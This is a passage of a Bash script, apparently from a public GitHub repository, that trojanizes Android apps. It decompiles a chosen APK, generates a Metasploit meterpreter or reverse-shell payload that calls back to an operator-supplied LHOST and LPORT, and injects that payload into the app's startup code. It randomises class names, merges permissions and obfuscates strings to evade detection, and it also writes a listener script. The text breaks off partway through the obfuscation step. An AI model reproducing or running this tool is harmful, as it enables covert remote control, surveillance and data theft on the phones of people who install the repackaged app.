/backdoor-apk/backdoor-apk.sh

https://github.com/dana-at-cp/backdoor-apk · Shell · 752 lines · 702 code · 31 blank · 19 comment · 44 complexity · 95ebebcabeee244ff0ade946dc79a352 MD5 · raw file 

    

  1. #!/bin/bash
    2. 

  2. 

  3. # file: backdoor-apk.sh
    4. 

  4. 

  5. # usage: ./backdoor-apk.sh original.apk
    6. 

  6. 

  7. # Dana James Traversie
    8. 

  8. # Security Architect | Hacker-in-Residence
    9. 

  9. # Check Point Software Technologies, Ltd.
    10. 

  10. 

  11. # IMPORTANT: The following packages were required on Kali Linux
    12. 

  12. #   in order to get things rolling. These packages are likely
    13. 

  13. #   required by other Linux distros as well.
    14. 

  14. # apt-get install lib32z1 lib32ncurses5 lib32stdc++6
    15. 

  15. 

  16. VERSION="0.2.4a"
    17. 

  17. 

  18. PAYLOAD=""
    19. 

  19. LHOST=""
    20. 

  20. LPORT=""
    21. 

  21. PERM_OPT=""
    22. 

  22. 

  23. ORIG_PACKAGE=""
    24. 

  24. INJECT_PACKAGE=""
    25. 

  25. SMALI_FILE_TO_HOOK=""
    26. 

  26. 

  27. MSFVENOM=msfvenom
    28. 

  28. BAKSMALI=baksmali
    29. 

  29. UNZIP=unzip
    30. 

  30. KEYTOOL=keytool
    31. 

  31. JARSIGNER=jarsigner
    32. 

  32. APKTOOL=apktool
    33. 

  33. ASO=third-party/android-string-obfuscator/lib/aso
    34. 

  34. DX=third-party/android-sdk-linux/build-tools/25.0.2/dx
    35. 

  35. ZIPALIGN=third-party/android-sdk-linux/build-tools/25.0.2/zipalign
    36. 

  36. # file paths and misc
    37. 

  37. MY_PATH=`pwd`
    38. 

  38. TMP_DIR=$MY_PATH/tmp
    39. 

  39. ORIG_APK_FILE=$1
    40. 

  40. ORIG_APK_FILE_NAME=""
    41. 

  41. RAT_APK_FILE=Rat.apk
    42. 

  42. LOG_FILE=$MY_PATH/run.log
    43. 

  43. TIME_OF_RUN=`date`
    44. 

  44. # for functions
    45. 

  45. FUNC_RESULT=""
    46. 

  46. 

  47. # functions
    48. 

  48. function gen_placeholder {
    49. 

  49.   local result=$(cat /dev/urandom | tr -dc 'a-z' | fold -w 32 | head -n 1)
    50. 

  50.   FUNC_RESULT=$result
    51. 

  51.   return 0
    52. 

  52. }
    53. 

  53. 

  54. function gen_smali_package_dir {
    55. 

  55.   local dir=$(cat /dev/urandom | tr -dc 'a-z' | fold -w 5 | head -n 1)
    56. 

  56.   FUNC_RESULT=$dir
    57. 

  57.   return 0
    58. 

  58. }
    59. 

  59. 

  60. function gen_smali_class_name {
    61. 

  61.   local start=$(cat /dev/urandom | tr -dc 'A-Z' | fold -w 1 | head -n 1)
    62. 

  62.   local end=$(cat /dev/urandom | tr -dc 'a-z' | fold -w 4 | head -n 1)
    63. 

  63.   FUNC_RESULT=$start$end
    64. 

  64.   return 0
    65. 

  65. }
    66. 

  66. 

  67. function find_smali_file {
    68. 

  68.   # $1 = smali_file_to_hook
    69. 

  69.   # $2 = android_class
    70. 

  70.   if [ ! -f $1 ]; then
    71. 

  71.     local index=2
    72. 

  72.     local max=1000
    73. 

  73.     local smali_file=""
    74. 

  74.     while [ $index -lt $max ]; do
    75. 

  75.       smali_file=$MY_PATH/original/smali_classes$index/$2.smali
    76. 

  76.       if [ -f $smali_file ]; then
    77. 

  77.         # found
    78. 

  78.         FUNC_RESULT=$smali_file
    79. 

  79.         return 0
    80. 

  80.       else
    81. 

  81.         let index=index+1
    82. 

  82.       fi
    83. 

  83.     done
    84. 

  84.     # not found
    85. 

  85.     return 1
    86. 

  86.   else
    87. 

  87.     FUNC_RESULT=$1
    88. 

  88.     return 0
    89. 

  89.   fi
    90. 

  90. }
    91. 

  91. 

  92. function hook_smali_file {
    93. 

  93.   # $1 = new_ms_name
    94. 

  94.   # $2 = smali_file_to_hook
    95. 

  95.   local smali_file=$2
    96. 

  96.   inject_line_num=$(grep -n "return-void" $smali_file |head -n 1|awk -F ":" '{ print $1 }')
    97. 

  97.   sed -i ''"$inject_line_num"'i\ \ \ \ invoke-static \{\}, L'"$INJECT_PACKAGE"'\/'"$1"';->start()V\n' $smali_file >>$LOG_FILE 2>&1
    98. 

  98.   grep -B 2 "$INJECT_PACKAGE/$1" $smali_file >>$LOG_FILE 2>&1
    99. 

  99.   if [ $? == 0 ]; then
    100. 

  100.     echo "The smali file was hooked successfully" >>$LOG_FILE 2>&1
    101. 

  101.     FUNC_RESULT=$smali_file
    102. 

  102.     return 0
    103. 

  103.   else
    104. 

  104.     echo "Failed to hook smali file" >>$LOG_FILE 2>&1
    105. 

  105.     return 1
    106. 

  106.   fi
    107. 

  107. }
    108. 

  108. 

  109. function cleanup {
    110. 

  110.   echo "Forcing cleanup due to a failure or error state!" >>$LOG_FILE 2>&1
    111. 

  111.   bash cleanup.sh >>$LOG_FILE 2>&1
    112. 

  112. }
    113. 

  113. 

  114. function verify_orig_apk {
    115. 

  115.   if [ -z $ORIG_APK_FILE ]; then
    116. 

  116.     echo "[!] No original APK file specified"
    117. 

  117.     exit 1
    118. 

  118.   fi
    119. 

  119. 

  120.   if [ ! -f $ORIG_APK_FILE ]; then
    121. 

  121.     echo "[!] Original APK file specified does not exist"
    122. 

  122.     exit 1
    123. 

  123.   fi
    124. 

  124. 

  125.   $UNZIP -l $ORIG_APK_FILE >>$LOG_FILE 2>&1
    126. 

  126.   rc=$?
    127. 

  127.   if [ $rc != 0 ]; then
    128. 

  128.     echo "[!] Original APK file specified is not valid"
    129. 

  129.     exit $rc
    130. 

  130.   fi
    131. 

  131. }
    132. 

  132. 

  133. function consult_which {
    134. 

  134.   which $1 >>$LOG_FILE 2>&1
    135. 

  135.   rc=$?
    136. 

  136.   if [ $rc != 0 ]; then
    137. 

  137.     echo "[!] Check your environment and configuration. Couldn't find: $1"
    138. 

  138.     exit $rc
    139. 

  139.   fi
    140. 

  140. }
    141. 

  141. 

  142. function print_ascii_art {
    143. 

  143. cat << "EOF"
    144. 

  144.           ________
    145. 

  145.          / ______ \
    146. 

  146.          || _  _ ||
    147. 

  147.          ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
    148. 

  148.          |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
    149. 

  149.          || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
    150. 

  150.          ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
    151. 

  151.          |||_||_|||         AAA  AAA  PPP       KKK  KKK
    152. 

  152.          ||______||         AAA  AAA  PPP       KKK  KKK
    153. 

  153.         /__________\
    154. 

  154. ________|__________|__________________________________________
    155. 

  155.        /____________\
    156. 

  156.        |____________|            Dana James Traversie
    157. 

  157. 

  158. EOF
    159. 

  159. }
    160. 

  160. 

  161. function get_payload {
    162. 

  162.   echo "[+] Android payload options:"
    163. 

  163.   PS3='[?] Please select an Android payload option: '
    164. 

  164.   options=("meterpreter/reverse_http" "meterpreter/reverse_https" "meterpreter/reverse_tcp" "shell/reverse_http" "shell/reverse_https" "shell/reverse_tcp")
    165. 

  165.   select opt in "${options[@]}"
    166. 

  166.   do
    167. 

  167.     case $opt in
    168. 

  168.       "meterpreter/reverse_http")
    169. 

  169.         PAYLOAD="android/meterpreter/reverse_http"
    170. 

  170.         break
    171. 

  171.         ;;
    172. 

  172.       "meterpreter/reverse_https")
    173. 

  173.         PAYLOAD="android/meterpreter/reverse_https"
    174. 

  174.         break
    175. 

  175.         ;;
    176. 

  176.       "meterpreter/reverse_tcp")
    177. 

  177.         PAYLOAD="android/meterpreter/reverse_tcp"
    178. 

  178.         break
    179. 

  179.         ;;
    180. 

  180.       "shell/reverse_http")
    181. 

  181.         PAYLOAD="android/shell/reverse_http"
    182. 

  182.         break
    183. 

  183.         ;;
    184. 

  184.       "shell/reverse_https")
    185. 

  185.         PAYLOAD="android/shell/reverse_https"
    186. 

  186.         break
    187. 

  187.         ;;
    188. 

  188.       "shell/reverse_tcp")
    189. 

  189.         PAYLOAD="android/shell/reverse_tcp"
    190. 

  190.         break
    191. 

  191.         ;;
    192. 

  192.       *)
    193. 

  193.         echo "[!] Invalid option selected"
    194. 

  194.         ;;
    195. 

  195.     esac
    196. 

  196.   done
    197. 

  197. }
    198. 

  198. 

  199. function get_lhost {
    200. 

  200.   while true; do
    201. 

  201.     read -p "[?] Please enter an LHOST value: " lh
    202. 

  202.     if [ $lh ]; then
    203. 

  203.       LHOST=$lh
    204. 

  204.       break
    205. 

  205.     fi
    206. 

  206.   done
    207. 

  207. }
    208. 

  208. 

  209. function get_lport {
    210. 

  210.   while true; do
    211. 

  211.     read -p "[?] Please enter an LPORT value: " lp
    212. 

  212.     if [ $lp ]; then
    213. 

  213.       if [[ "$lp" =~ ^[0-9]+$ ]] && [ "$lp" -ge 1 -a "$lp" -le 65535 ]; then
    214. 

  214.         LPORT=$lp
    215. 

  215.         break
    216. 

  216.       fi
    217. 

  217.     fi
    218. 

  218.   done
    219. 

  219. }
    220. 

  220. 

  221. function get_perm_opt {
    222. 

  222.   echo "[+] Android manifest permission options:"
    223. 

  223.   PS3='[?] Please select an Android manifest permission option: '
    224. 

  224.   options=("Keep original" "Merge with payload and shuffle")
    225. 

  225.   select opt in "${options[@]}"
    226. 

  226.   do
    227. 

  227.     case $opt in
    228. 

  228.       "Keep original")
    229. 

  229.         PERM_OPT="KEEPO"
    230. 

  230.         break
    231. 

  231.         ;;
    232. 

  232.       "Merge with payload and shuffle")
    233. 

  233.         PERM_OPT="RANDO"
    234. 

  234.         break
    235. 

  235.         ;;
    236. 

  236.       *)
    237. 

  237.         echo "[!] Invalid option selected"
    238. 

  238.         ;;
    239. 

  239.     esac
    240. 

  240.   done
    241. 

  241. }
    242. 

  242. 

  243. function init {
    244. 

  244.   echo "Running backdoor-apk at $TIME_OF_RUN" >$LOG_FILE 2>&1
    245. 

  245.   print_ascii_art
    246. 

  246.   echo "[*] Running backdoor-apk.sh v$VERSION on $TIME_OF_RUN"
    247. 

  247.   consult_which $MSFVENOM
    248. 

  248.   consult_which $BAKSMALI
    249. 

  249.   consult_which $UNZIP
    250. 

  250.   consult_which $KEYTOOL
    251. 

  251.   consult_which $JARSIGNER
    252. 

  252.   consult_which $APKTOOL
    253. 

  253.   consult_which $ASO
    254. 

  254.   consult_which $DX
    255. 

  255.   consult_which $ZIPALIGN
    256. 

  256.   verify_orig_apk
    257. 

  257.   get_payload
    258. 

  258.   get_lhost
    259. 

  259.   get_lport
    260. 

  260.   get_perm_opt
    261. 

  261.   mkdir -v $TMP_DIR >>$LOG_FILE 2>&1
    262. 

  262. }
    263. 

  263. 

  264. # kick things off
    265. 

  265. init
    266. 

  266. 

  267. # generate Metasploit resource script
    268. 

  268. # credit to John Troony for the suggestion
    269. 

  269. cat >$MY_PATH/backdoor-apk.rc <<EOL
    270. 

  270. use exploit/multi/handler
    271. 

  271. set PAYLOAD $PAYLOAD
    272. 

  272. set LHOST $LHOST
    273. 

  273. set LPORT $LPORT
    274. 

  274. set ExitOnSession false
    275. 

  275. exploit -j -z
    276. 

  276. EOL
    277. 

  277. echo "[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc"
    278. 

  278. 

  279. ORIG_APK_FILE_NAME=`echo "${ORIG_APK_FILE##*/}"`
    280. 

  280. echo "Wroking on original APK: $ORIG_APK_FILE_NAME" >>$LOG_FILE 2>&1
    281. 

  281. echo -n "[*] Decompiling original APK file..."
    282. 

  282. $APKTOOL d -f -o $MY_PATH/original $MY_PATH/$ORIG_APK_FILE >>$LOG_FILE 2>&1
    283. 

  283. rc=$?
    284. 

  284. echo "done."
    285. 

  285. if [ $rc != 0 ]; then
    286. 

  286.   echo "[!] Failed to decompile original APK file"
    287. 

  287.   cleanup
    288. 

  288.   exit $rc
    289. 

  289. fi
    290. 

  290. 

  291. echo -n "[*] Locating smali file to hook in original project..."
    292. 

  292. total_package=`head -n 2 $MY_PATH/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'`
    293. 

  293. android_name=`grep "<application" $MY_PATH/original/AndroidManifest.xml|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'`
    294. 

  294. echo "Value of android_name: $android_name" >>$LOG_FILE 2>&1
    295. 

  295. android_class=$android_name
    296. 

  296. echo "Value of android_class: $android_class" >>$LOG_FILE 2>&1
    297. 

  297. smali_file_to_hook=$MY_PATH/original/smali/$android_class.smali
    298. 

  298. find_smali_file $smali_file_to_hook $android_class
    299. 

  299. rc=$?
    300. 

  300. if [ $rc != 0 ]; then
    301. 

  301.   echo "done."
    302. 

  302.   echo "[!] Failed to locate smali file to hook"
    303. 

  303.   cleanup
    304. 

  304.   exit $rc
    305. 

  305. else
    306. 

  306.   echo "done."
    307. 

  307.   smali_file_to_hook=$FUNC_RESULT
    308. 

  308.   echo "The smali file to hook: $smali_file_to_hook" >>$LOG_FILE 2>&1
    309. 

  309.   ORIG_PACKAGE=$total_package
    310. 

  310.   SMALI_FILE_TO_HOOK=$smali_file_to_hook
    311. 

  311. fi
    312. 

  312. echo "[+] Package where RAT smali files will be injected: $ORIG_PACKAGE"
    313. 

  313. echo "[+] Smali file to hook RAT payload: $android_class.smali"
    314. 

  314. 

  315. echo -n "[*] Generating RAT APK file..."
    316. 

  316. $MSFVENOM -a dalvik --platform android -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f raw -o $RAT_APK_FILE >>$LOG_FILE 2>&1
    317. 

  317. rc=$?
    318. 

  318. echo "done."
    319. 

  319. if [ $rc != 0 ] || [ ! -f $RAT_APK_FILE ]; then
    320. 

  320.   echo "[!] Failed to generate RAT APK file"
    321. 

  321.   exit 1
    322. 

  322. fi
    323. 

  323. 

  324. echo -n "[*] Decompiling RAT APK file..."
    325. 

  325. $APKTOOL d -f -o $MY_PATH/payload $MY_PATH/$RAT_APK_FILE >>$LOG_FILE 2>&1
    326. 

  326. rc=$?
    327. 

  327. echo "done."
    328. 

  328. if [ $rc != 0 ]; then
    329. 

  329.   echo "[!] Failed to decompile RAT APK file"
    330. 

  330.   cleanup
    331. 

  331.   exit $rc
    332. 

  332. fi
    333. 

  333. 

  334. gen_placeholder
    335. 

  335. placeholder=$FUNC_RESULT
    336. 

  336. echo "placeholder value: $placeholder" >>$LOG_FILE 2>&1
    337. 

  337. 

  338. original_manifest_file=$MY_PATH/original/AndroidManifest.xml
    339. 

  339. if [ "$PERM_OPT" == "RANDO" ]; then
    340. 

  340.   echo -n "[*] Merging permissions of original and payload projects..."
    341. 

  341.   tmp_perms_file=$MY_PATH/perms.tmp
    342. 

  342.   payload_manifest_file=$MY_PATH/payload/AndroidManifest.xml
    343. 

  343.   merged_manifest_file=$MY_PATH/original/AndroidManifest.xml.merged
    344. 

  344.   grep "<uses-permission" $original_manifest_file >$tmp_perms_file
    345. 

  345.   grep "<uses-permission" $payload_manifest_file >>$tmp_perms_file
    346. 

  346.   grep "<uses-permission" $tmp_perms_file|sort|uniq|shuf >$tmp_perms_file.uniq
    347. 

  347.   mv $tmp_perms_file.uniq $tmp_perms_file
    348. 

  348.   sed "s/<uses-permission.*\/>/$placeholder/g" $original_manifest_file >$merged_manifest_file
    349. 

  349.   awk '/^[ \t]*'"$placeholder"'/&&c++ {next} 1' $merged_manifest_file >$merged_manifest_file.uniq
    350. 

  350.   mv $merged_manifest_file.uniq $merged_manifest_file
    351. 

  351.   sed -i "s/$placeholder/$(sed -e 's/[\&/]/\\&/g' -e 's/$/\\n/' $tmp_perms_file | tr -d '\n')/" $merged_manifest_file
    352. 

  352.   diff $original_manifest_file $merged_manifest_file >>$LOG_FILE 2>&1
    353. 

  353.   mv $merged_manifest_file $original_manifest_file
    354. 

  354.   echo "done."
    355. 

  355.   # cleanup payload directory after merging app permissions
    356. 

  356.   #rm -rf $MY_PATH/payload >>$LOG_FILE 2>&1
    357. 

  357. elif [ "$PERM_OPT" == "KEEPO" ]; then
    358. 

  358.   echo "[+] Keeping permissions of original project"
    359. 

  359. else
    360. 

  360.   echo "[!] Something went terribly wrong..."
    361. 

  361.   cleanup
    362. 

  362.   exit 1
    363. 

  363. fi
    364. 

  364. 

  365. # use dx and baksmali to inject Java classes
    366. 

  366. echo -n "[*] Injecting helpful Java classes in RAT APK file..."
    367. 

  367. mkdir -v -p $MY_PATH/bin/classes >>$LOG_FILE 2>&1
    368. 

  368. mkdir -v -p $MY_PATH/libs >>$LOG_FILE 2>&1
    369. 

  369. $DX --dex --output="$MY_PATH/bin/classes/classes.dex" $MY_PATH/java/* >>$LOG_FILE 2>&1
    370. 

  370. rc=$?
    371. 

  371. if [ $rc != 0 ]; then
    372. 

  372.   echo "done."
    373. 

  373.   echo "[!] Failed to run dx on Java class files"
    374. 

  374.   cleanup
    375. 

  375.   exit $rc
    376. 

  376. fi
    377. 

  377. $BAKSMALI d -o $MY_PATH/bin/classes/smali $MY_PATH/bin/classes/classes.dex >>$LOG_FILE 2>&1
    378. 

  378. rc=$?
    379. 

  379. if [ $rc != 0 ]; then
    380. 

  380.   echo "done."
    381. 

  381.   echo "[!] Failed to run baksmali on classes.dex created for Java class files"
    382. 

  382.   cleanup
    383. 

  383.   exit $rc
    384. 

  384. fi
    385. 

  385. cp -v -r $MY_PATH/bin/classes/smali/* $MY_PATH/payload/smali >>$LOG_FILE 2>&1
    386. 

  386. rc=$?
    387. 

  387. if [ $rc != 0 ]; then
    388. 

  388.   echo "done."
    389. 

  389.   echo "[!] Failed to inject smali files dervied from Java classes"
    390. 

  390.   cleanup
    391. 

  391.   exit $rc
    392. 

  392. fi
    393. 

  393. echo "done."
    394. 

    395. 

  395. # avoid having com/metasploit/stage path to smali files
    396. 

  396. echo -n "[*] Creating new directory in original package for RAT smali files..."
    397. 

  397. gen_smali_package_dir
    398. 

  398. inject_package_dir=$FUNC_RESULT
    399. 

  399. inject_package_path=$ORIG_PACKAGE/$inject_package_dir
    400. 

  400. mkdir -v -p $MY_PATH/original/smali/$inject_package_path >>$LOG_FILE 2>&1
    401. 

  401. rc=$?
    402. 

  402. echo "done."
    403. 

  403. if [ $rc != 0 ]; then
    404. 

  404.   echo "[!] Failed to create new directory for RAT smali files"
    405. 

  405.   cleanup
    406. 

  406.   exit $rc
    407. 

  407. else
    408. 

  408.   echo "[+] Inject package path: $inject_package_path"
    409. 

  409.   INJECT_PACKAGE=$inject_package_path
    410. 

  410. fi
    411. 

    412. 

  412. # create new smali class names
    413. 

  413. gen_smali_class_name
    414. 

  414. new_mbr_name=$FUNC_RESULT
    415. 

  415. echo "[+] Generated new smali class name for MainBroadcastReceiver.smali: $new_mbr_name"
    416. 

  416. gen_smali_class_name
    417. 

  417. new_ms_name=$FUNC_RESULT
    418. 

  418. echo "[+] Generated new smali class name for MainService.smali: $new_ms_name"
    419. 

  419. gen_smali_class_name
    420. 

  420. new_payload_name=$FUNC_RESULT
    421. 

  421. echo "[+] Generated new smali class name for Payload.smali: $new_payload_name"
    422. 

  422. gen_smali_class_name
    423. 

  423. new_so_name=$FUNC_RESULT
    424. 

  424. echo "[+] Generated new smali class name for StringObfuscator.smali: $new_so_name"
    425. 

  425. gen_smali_package_dir
    426. 

  426. new_so_obfuscate_method_name=$FUNC_RESULT
    427. 

  427. echo "[+] Generated new smali method name for StringObfuscator.obfuscate method: $new_so_obfuscate_method_name"
    428. 

  428. gen_smali_package_dir
    429. 

  429. new_so_unobfuscate_method_name=$FUNC_RESULT
    430. 

  430. echo "[+] Generated new smali method name for StringObfuscator.unobfuscate method: $new_so_unobfuscate_method_name"
    431. 

    432. 

  432. echo -n "[*] Copying RAT smali files to new directories in original project..."
    433. 

  433. # handle MainBroadcastReceiver.smali
    434. 

  434. mv -v $MY_PATH/payload/smali/com/metasploit/stage/MainBroadcastReceiver.smali $MY_PATH/original/smali/$INJECT_PACKAGE/$new_mbr_name.smali >>$LOG_FILE 2>&1
    435. 

  435. rc=$?
    436. 

  436. if [ $rc == 0 ]; then
    437. 

  437.   # handle MainService.smali
    438. 

  438.   mv -v $MY_PATH/payload/smali/com/metasploit/stage/MainService.smali $MY_PATH/original/smali/$INJECT_PACKAGE/$new_ms_name.smali >>$LOG_FILE 2>&1
    439. 

  439.   rc=$?
    440. 

  440. fi
    441. 

  441. if [ $rc == 0 ]; then
    442. 

  442.   # handle Payload.smali
    443. 

  443.   mv -v $MY_PATH/payload/smali/com/metasploit/stage/Payload.smali $MY_PATH/original/smali/$INJECT_PACKAGE/$new_payload_name.smali >>$LOG_FILE 2>&1
    444. 

  444.   rc=$?
    445. 

  445. fi
    446. 

  446. if [ $rc == 0 ]; then
    447. 

  447.   cp -v $MY_PATH/payload/smali/com/metasploit/stage/*.smali $MY_PATH/original/smali/$INJECT_PACKAGE >>$LOG_FILE 2>&1
    448. 

  448.   rc=$?
    449. 

  449. fi
    450. 

  450. if [ $rc == 0 ]; then
    451. 

  451.   rm -v $MY_PATH/original/smali/$INJECT_PACKAGE/MainActivity.smali >>$LOG_FILE 2>&1
    452. 

  452.   rc=$?
    453. 

  453. fi
    454. 

  454. if [ $rc == 0 ]; then
    455. 

  455.   cp -v $MY_PATH/payload/smali/net/dirtybox/util/obfuscation/StringObfuscator.smali $MY_PATH/original/smali/$INJECT_PACKAGE/$new_so_name.smali >>$LOG_FILE 2>&1
    456. 

  456.   rc=$?
    457. 

  457. fi
    458. 

  458. echo "done."
    459. 

  459. if [ $rc != 0 ]; then
    460. 

  460.   echo "[!] Failed to copy RAT smali files"
    461. 

  461.   cleanup
    462. 

  462.   exit $rc
    463. 

  463. fi
    464. 

    465. 

  465. echo -n "[*] Fixing RAT smali files..."
    466. 

  466. sed -i "s/MainBroadcastReceiver/$new_mbr_name/g" $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali >>$LOG_FILE 2>&1
    467. 

  467. rc=$?
    468. 

  468. if [ $rc == 0 ]; then
    469. 

  469.   sed -i "s/MainService/$new_ms_name/g" $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali >>$LOG_FILE 2>&1
    470. 

  470.   rc=$?
    471. 

  471. fi
    472. 

  472. if [ $rc == 0 ]; then
    473. 

  473.   sed -i "s/Payload/$new_payload_name/g" $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali >>$LOG_FILE 2>&1
    474. 

  474.   rc=$?
    475. 

  475. fi
    476. 

  476. if [ $rc == 0 ]; then
    477. 

  477.   sed -i "s/StringObfuscator/$new_so_name/g" $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali >>$LOG_FILE 2>&1
    478. 

  478.   rc=$?
    479. 

  479. fi
    480. 

  480. if [ $rc == 0 ]; then
    481. 

  481.   sed -i 's|com\([./]\)metasploit\([./]\)stage|'"$INJECT_PACKAGE"'|g' $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali >>$LOG_FILE 2>&1
    482. 

  482.   rc=$?
    483. 

  483. fi
    484. 

  484. if [ $rc == 0 ]; then
    485. 

  485.   sed -i 's|net\([./]\)dirtybox\([./]\)util\([./]\)obfuscation|'"$INJECT_PACKAGE"'|g' $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali >>$LOG_FILE 2>&1
    486. 

  486.   rc=$?
    487. 

  487. fi
    488. 

  488. if [ $rc == 0 ]; then
    489. 

  489.   #.method public static obfuscate(Ljava/lang/String;)Ljava/lang/String;
    490. 

  490.   #.method public static unobfuscate(Ljava/lang/String;)Ljava/lang/String;
    491. 

  491.   sed -i 's:method public static obfuscate:method public static '"$new_so_obfuscate_method_name"':g' $MY_PATH/original/smali/$INJECT_PACKAGE/$new_so_name.smali >>$LOG_FILE 2>&1
    492. 

  492.   rc=$?
    493. 

  493.   if [ $rc == 0 ]; then
    494. 

  494.     sed -i 's:method public static unobfuscate:method public static '"$new_so_unobfuscate_method_name"':g' $MY_PATH/original/smali/$INJECT_PACKAGE/$new_so_name.smali >>$LOG_FILE 2>&1
    495. 

  495.     rc=$?
    496. 

  496.   fi
    497. 

  497. fi
    498. 

  498. echo "done."
    499. 

  499. if [ $rc != 0 ]; then
    500. 

  500.   echo "[!] Failed to fix RAT smali files"
    501. 

  501.   cleanup
    502. 

  502.   exit $rc
    503. 

  503. fi
    504. 

    505. 

  505. # TODO: Refactor and improve error handling and logging
    506. 

  506. echo -n "[*] Obfuscating const-string values in RAT smali files..."
    507. 

  507. cat >$MY_PATH/obfuscate.method <<EOL
    508. 

  508.     const-string ###REG###, "###VALUE###"
    509. 

    510. 

  510.     invoke-static {###REG###}, L###CLASS###;->###METHOD###(Ljava/lang/String;)Ljava/lang/String;
    511. 

    512. 

  512.     move-result-object ###REG###
    513. 

  513. EOL
    514. 

  514. stringobfuscator_class=$INJECT_PACKAGE/$new_so_name
    515. 

  515. echo "StringObfuscator class: $stringobfuscator_class" >>$LOG_FILE 2>&1
    516. 

  516. so_class_suffix="$new_so_name.smali"
    517. 

  517. echo "StringObfuscator class suffix: $so_class_suffix" >>$LOG_FILE 2>&1
    518. 

  518. so_default_key="7IPR19mk6hmUY+hdYUaCIw=="
    519. 

  519. so_key=$so_default_key
    520. 

  520. which openssl >>$LOG_FILE 2>&1
    521. 

  521. rc=$?
    522. 

  522. if [ $rc == 0 ]; then
    523. 

  523.   so_key="$(openssl rand -base64 16)"
    524. 

  524.   rc=$?
    525. 

  525. fi
    526. 

  526. if [ $rc == 0 ]; then
    527. 

  527.   file="$MY_PATH/original/smali/$stringobfuscator_class.smali"
    528. 

  528.   sed -i 's%'"$so_default_key"'%'"$so_key"'%' $file >>$LOG_FILE 2>&1
    529. 

  529.   rc=$?
    530. 

  530.   if [ $rc == 0 ]; then
    531. 

  531.     echo "Injected new key into StringObufscator class" >>$LOG_FILE 2>&1
    532. 

  532.   else
    533. 

  533.     echo "Failed to inject new key into StringObfuscator class, using default key" >>$LOG_FILE 2>&1
    534. 

  534.     so_key=$so_default_key
    535. 

  535.   fi
    536. 

  536. else
    537. 

  537.   echo "Failed to generate a new StringObfuscator key, using default key" >>$LOG_FILE 2>&1
    538. 

  538.   so_key=$so_default_key 
    539. 

  539. fi
    540. 

  540. echo "StringObfuscator key: $so_key" >>$LOG_FILE 2>&1
    541. 

  541. sed -i 's/[[:space:]]*"$/"/g' $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali >>$LOG_FILE 2>&1
    542. 

  542. rc=$?
    543. 

  543. if [ $rc == 0 ]; then
    544. 

  544.   grep "const-string" -n --exclude="$so_class_suffix" $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali |while read -r line; do
    545. 

  545.     gen_placeholder
    546. 

  546.     placeholder=$FUNC_RESULT
    547. 

  547.     echo "Placeholder: $placeholder" >>$LOG_FILE 2>&1
    548. 

  548.     filewithlinenum=`echo $line |awk -F ": " '{ print $1 }'`
    549. 

  549.     echo "File with line num: $filewithlinenum" >>$LOG_FILE 2>&1
    550. 

  550.     file=`echo $filewithlinenum |awk -F ":" '{ print $1 }'`
    551. 

  551.     echo "File: $file" >>$LOG_FILE 2>&1
    552. 

  552.     linenum=`echo $filewithlinenum |awk -F ":" '{ print $2 }'`
    553. 

  553.     echo "Line num: $linenum" >>$LOG_FILE 2>&1
    554. 

  554.     target=`echo $line |awk -F ", " '{ print $2 }'`
    555. 

  555.     echo "Target: $target" >>$LOG_FILE 2>&1
    556. 

  556.     tmp=`echo $line |awk -F ": " '{ print $2 }'`
    557. 

  557.     reg=`echo $tmp |awk '{ print $2 }' |sed 's/,//'`
    558. 

  558.     echo "Reg: $reg" >>$LOG_FILE 2>&1
    559. 

  559.     stripped_target=`sed -e 's/^"//' -e 's/"$//' <<<"$target"`
    560. 

  560.     echo "Stripped target: $stripped_target" >>$LOG_FILE 2>&1
    561. 

  561.     replacement=`$ASO e "$stripped_target" k "$so_key"`
    562. 

  562.     rc=$?
    563. 

  563.     if [ $rc != 0 ]; then
    564. 

  564.       echo "Failed to obfuscate target value" >>$LOG_FILE 2>&1
    565. 

  565.       touch $MY_PATH/obfuscate.error
    566. 

  566.       break
    567. 

  567.     fi
    568. 

  568.     echo "Replacement: $replacement" >>$LOG_FILE 2>&1
    569. 

  569.     echo "" >> $LOG_FILE 2>&1
    570. 

    571. 

  571.     sed -i -e ''"$linenum"'d' $file >>$LOG_FILE 2>&1
    572. 

  572.     sed -i ''"$linenum"'i '"$placeholder"'' $file >>$LOG_FILE 2>&1
    573. 

    574. 

  574.     cp -v $MY_PATH/obfuscate.method $TMP_DIR/$placeholder.stub >>$LOG_FILE 2>&1
    575. 

    576. 

  576.     echo "$placeholder" >> $TMP_DIR/placeholders.txt
    577. 

    578. 

  578.     sed -i 's/###REG###/'"$reg"'/' $TMP_DIR/$placeholder.stub >>$LOG_FILE 2>&1
    579. 

  579.     rc=$?
    580. 

  580.     if [ $rc != 0 ]; then
    581. 

  581.       echo "Failed to inject register value" >>$LOG_FILE 2>&1
    582. 

  582.       touch $MY_PATH/obfuscate.error
    583. 

  583.       break
    584. 

  584.     fi
    585. 

  585.     sed -i 's|###VALUE###|'"$replacement"'|' $TMP_DIR/$placeholder.stub >>$LOG_FILE 2>&1
    586. 

  586.     rc=$?
    587. 

  587.     if [ $rc != 0 ]; then
    588. 

  588.       echo "Failed to inject replacement value" >>$LOG_FILE 2>&1
    589. 

  589.       touch $MY_PATH/obfuscate.error
    590. 

  590.       break
    591. 

  591.     fi
    592. 

  592.   done
    593. 

  593.   cd $TMP_DIR
    594. 

  594.   cat placeholders.txt |while read placeholder; do
    595. 

  595.     if [ -f $placeholder.stub ]; then
    596. 

  596.       sed -i -e '/'"$placeholder"'/r '"$placeholder"'.stub' $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali >>$LOG_FILE 2>&1
    597. 

